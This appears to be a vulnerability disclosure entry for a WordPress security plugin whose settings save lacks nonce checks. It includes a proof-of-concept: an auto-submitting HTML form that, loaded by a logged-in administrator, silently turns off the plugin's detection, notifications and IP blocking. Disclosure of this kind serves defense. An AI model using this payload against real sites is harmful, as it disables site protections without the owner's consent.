The plugin does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin's protections.
<form id="test" action="https://example.com/wp-admin/admin.php?page=lbsa_home" method="post"> <input type="text" name="savelbsa" value="1"> <input type="text" name="onlyfront" value="0"> <input type="text" name="checkwp" value="0"> <input type="text" name="namespaces" value="GET"> <input type="text" name="levelLFI" value="50"> <input type="text" name="sendnotification" value="0"> <input type="text" name="sendto" value=""> <input type="text" name="raiseerror" value="0"> <input type="text" name="redirurl" value="https://google.com"> <input type="text" name="errorcode" value=""> <input type="text" name="errormsg" value=""> <input type="text" name="ipblock" value="0"> <input type="text" name="ipblocktime" value="222"> <input type="text" name="ipblockcount" value="666666666"> </form> <script> document.getElementById("test").submit(); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-09-29 (about 11 months ago)
2022-09-29 (about 11 months ago)
2022-11-15 (about 10 months ago)